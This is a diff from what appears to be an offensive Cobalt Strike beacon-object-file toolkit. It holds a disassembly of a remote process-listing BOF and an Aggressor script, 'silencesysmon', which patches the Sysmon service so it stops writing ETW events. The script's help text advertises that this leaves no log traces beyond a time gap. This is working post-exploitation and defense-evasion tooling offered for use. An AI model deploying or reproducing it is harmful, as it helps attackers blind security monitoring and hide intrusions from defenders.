+                    00
+  00000000000002E6: 5F                 pop         rdi
+  00000000000002E7: C3                 ret
+  00000000000002E8: CC                 int         3
+  00000000000002E9: CC                 int         3
+  00000000000002EA: CC                 int         3
+  00000000000002EB: CC                 int         3
+  00000000000002EC: CC                 int         3
+  00000000000002ED: CC                 int         3
+  00000000000002EE: CC                 int         3
+  00000000000002EF: CC                 int         3
+ListProcesses:
+  00000000000002F0: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  00000000000002F5: 48 81 EC 58 02 00  sub         rsp,258h
+                    00
+  00000000000002FC: C7 44 24 38 00 00  mov         dword ptr [rsp+38h],0
+                    00 00
+  0000000000000304: C7 44 24 34 00 00  mov         dword ptr [rsp+34h],0
+                    00 00
+  000000000000030C: 48 8D 44 24 38     lea         rax,[rsp+38h]
+  0000000000000311: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000316: 4C 8D 4C 24 40     lea         r9,[rsp+40h]
+  000000000000031B: 41 B8 01 00 00 00  mov         r8d,1
+  0000000000000321: 33 D2              xor         edx,edx
+  0000000000000323: 48 8B 8C 24 60 02  mov         rcx,qword ptr [rsp+260h]
+                    00 00
+  000000000000032B: FF 15 00 00 00 00  call        qword ptr [__imp_WTSAPI32$WTSEnumerateProcessesA]
+  0000000000000331: 85 C0              test        eax,eax
+  0000000000000333: 75 1B              jne         0000000000000350
+  0000000000000335: 48 8D 15 00 00 00  lea         rdx,[$SG99888]
+                    00
+  000000000000033C: B9 0D 00 00 00     mov         ecx,0Dh
+  0000000000000341: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000347: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  000000000000034B: E9 CE 00 00 00     jmp         000000000000041E
+  0000000000000350: 48 8D 0D 00 00 00  lea         rcx,[$SG99889]
+                    00
+  0000000000000357: E8 00 00 00 00     call        BeaconPrintToStreamW
+  000000000000035C: 48 8D 0D 00 00 00  lea         rcx,[$SG99890]
+                    00
+  0000000000000363: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000368: C7 44 24 30 00 00  mov         dword ptr [rsp+30h],0
+                    00 00
+  0000000000000370: EB 0A              jmp         000000000000037C
+  0000000000000372: 8B 44 24 30        mov         eax,dword ptr [rsp+30h]
+  0000000000000376: FF C0              inc         eax
+  0000000000000378: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000037C: 8B 44 24 38        mov         eax,dword ptr [rsp+38h]
+  0000000000000380: 39 44 24 30        cmp         dword ptr [rsp+30h],eax
+  0000000000000384: 0F 83 82 00 00 00  jae         000000000000040C
+  000000000000038A: 48 63 44 24 30     movsxd      rax,dword ptr [rsp+30h]
+  000000000000038F: 48 6B C0 18        imul        rax,rax,18h
+  0000000000000393: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  0000000000000398: 48 8B 44 01 08     mov         rax,qword ptr [rcx+rax+8]
+  000000000000039D: 48 89 44 24 48     mov         qword ptr [rsp+48h],rax
+  00000000000003A2: C7 44 24 28 00 01  mov         dword ptr [rsp+28h],100h
+                    00 00
+  00000000000003AA: 48 8D 44 24 50     lea         rax,[rsp+50h]
+  00000000000003AF: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  00000000000003B4: 41 B9 FF FF FF FF  mov         r9d,0FFFFFFFFh
+  00000000000003BA: 4C 8B 44 24 48     mov         r8,qword ptr [rsp+48h]
+  00000000000003BF: 33 D2              xor         edx,edx
+  00000000000003C1: 33 C9              xor         ecx,ecx
+  00000000000003C3: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$MultiByteToWideChar]
+  00000000000003C9: 48 63 44 24 30     movsxd      rax,dword ptr [rsp+30h]
+  00000000000003CE: 48 6B C0 18        imul        rax,rax,18h
+  00000000000003D2: 48 63 4C 24 30     movsxd      rcx,dword ptr [rsp+30h]
+  00000000000003D7: 48 6B C9 18        imul        rcx,rcx,18h
+  00000000000003DB: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  00000000000003E0: 44 8B 0C 02        mov         r9d,dword ptr [rdx+rax]
+  00000000000003E4: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  00000000000003E9: 44 8B 44 08 04     mov         r8d,dword ptr [rax+rcx+4]
+  00000000000003EE: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  00000000000003F3: 48 8D 0D 00 00 00  lea         rcx,[$SG99891]
+                    00
+  00000000000003FA: E8 00 00 00 00     call        BeaconPrintToStreamW
+  00000000000003FF: C7 44 24 34 01 00  mov         dword ptr [rsp+34h],1
+                    00 00
+  0000000000000407: E9 66 FF FF FF     jmp         0000000000000372
+  000000000000040C: 48 8B 8C 24 60 02  mov         rcx,qword ptr [rsp+260h]
+                    00 00
+  0000000000000414: FF 15 00 00 00 00  call        qword ptr [__imp_WTSAPI32$WTSCloseServer]
+  000000000000041A: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  000000000000041E: 48 81 C4 58 02 00  add         rsp,258h
+                    00
+  0000000000000425: C3                 ret
+  0000000000000426: CC                 int         3
+  0000000000000427: CC                 int         3
+  0000000000000428: CC                 int         3
+  0000000000000429: CC                 int         3
+  000000000000042A: CC                 int         3
+  000000000000042B: CC                 int         3
+  000000000000042C: CC                 int         3
+  000000000000042D: CC                 int         3
+  000000000000042E: CC                 int         3
+  000000000000042F: CC                 int         3
+go:
+  0000000000000430: 89 54 24 10        mov         dword ptr [rsp+10h],edx
+  0000000000000434: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  0000000000000439: 48 83 EC 58        sub         rsp,58h
+  000000000000043D: C7 44 24 24 00 00  mov         dword ptr [rsp+24h],0
+                    00 00
+  0000000000000445: 48 C7 44 24 28 00  mov         qword ptr [rsp+28h],0
+                    00 00 00
+  000000000000044E: C7 44 24 20 00 00  mov         dword ptr [rsp+20h],0
+                    00 00
+  0000000000000456: 44 8B 44 24 68     mov         r8d,dword ptr [rsp+68h]
+  000000000000045B: 48 8B 54 24 60     mov         rdx,qword ptr [rsp+60h]
+  0000000000000460: 48 8D 4C 24 38     lea         rcx,[rsp+38h]
+  0000000000000465: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconDataParse]
+  000000000000046B: 48 8D 54 24 24     lea         rdx,[rsp+24h]
+  0000000000000470: 48 8D 4C 24 38     lea         rcx,[rsp+38h]
+  0000000000000475: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconDataExtract]
+  000000000000047B: 48 89 44 24 30     mov         qword ptr [rsp+30h],rax
+  0000000000000480: 48 8B 4C 24 30     mov         rcx,qword ptr [rsp+30h]
+  0000000000000485: FF 15 00 00 00 00  call        qword ptr [__imp_WTSAPI32$WTSOpenServerA]
+  000000000000048B: 48 89 44 24 28     mov         qword ptr [rsp+28h],rax
+  0000000000000490: 48 8B 4C 24 28     mov         rcx,qword ptr [rsp+28h]
+  0000000000000495: E8 00 00 00 00     call        ListProcesses
+  000000000000049A: 89 44 24 20        mov         dword ptr [rsp+20h],eax
+  000000000000049E: 83 7C 24 20 00     cmp         dword ptr [rsp+20h],0
+  00000000000004A3: 75 18              jne         00000000000004BD
+  00000000000004A5: 48 8D 15 00 00 00  lea         rdx,[$SG99908]
+                    00
+  00000000000004AC: B9 0D 00 00 00     mov         ecx,0Dh
+  00000000000004B1: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  00000000000004B7: 33 C0              xor         eax,eax
+  00000000000004B9: EB 18              jmp         00000000000004D3
+  00000000000004BB: EB 14              jmp         00000000000004D1
+  00000000000004BD: E8 00 00 00 00     call        BeaconOutputStreamW
+  00000000000004C2: 48 8D 15 00 00 00  lea         rdx,[$SG99909]
+                    00
+  00000000000004C9: 33 C9              xor         ecx,ecx
+  00000000000004CB: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  00000000000004D1: 33 C0              xor         eax,eax
+  00000000000004D3: 48 83 C4 58        add         rsp,58h
+  00000000000004D7: C3                 ret
+
+  Summary
+
+          38 .chks64
+         1E1 .data
+          80 .debug$S
+          5D .drectve
+          30 .pdata
+         4D8 .text$mn
+          24 .xdata

KIT/SilenceSysmon/silencesysmon.cna

@@ -1,29 +1,29 @@
 # author REDMED-X
 
 beacon_command_register(
-	"silencesysmon", "Silence Sysmon by patching its capability to write ETW events to the log.\n",
-	"INFO:\nSilence the Sysmon service by patching its capability to write ETW events to the log.\nRestarting the Sysmon service or the system itself will clear the patch and Sysmon will resume working normally.\nAltough this will not leave any traces in the log, there will be a time gap between the last and first new event.\n\nOPTIONS:\n[pid]: the process ID of the Sysmon service running on the system.\n\n" .
-	"USAGE:\nsilencesysmon <sysmon pid>\n\n");
+    "silencesysmon", "Silence Sysmon by patching its capability to write ETW events to the log.\n",
+    "INFO:\nSilence the Sysmon service by patching its capability to write ETW events to the log.\nRestarting the Sysmon service or the system itself will clear the patch and Sysmon will resume working normally.\nAltough this will not leave any traces in the log, there will be a time gap between the last and first new event.\n\nOPTIONS:\n[pid]: the process ID of the Sysmon service running on the system.\n\n" .
+    "USAGE:\nsilencesysmon <sysmon pid>\n\n");
 
 
 alias silencesysmon {
     $bid = $1;
     $pid = $2;
 
-	if ($pid eq "") {
-		berror($bid, "Please specify the process ID of the Sysmon service.\n");
-		return;
-	}
-	
+    if ($pid eq "") {
+        berror($bid, "Please specify the process ID of the Sysmon service.\n");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("silencesysmon.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
+    # Pack our arguments
     $arg_data  = bof_pack($bid, "i", $pid);
 
-	blog($bid, "Tasked to silence Sysmon..");
+    blog($bid, "Tasked to silence Sysmon..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }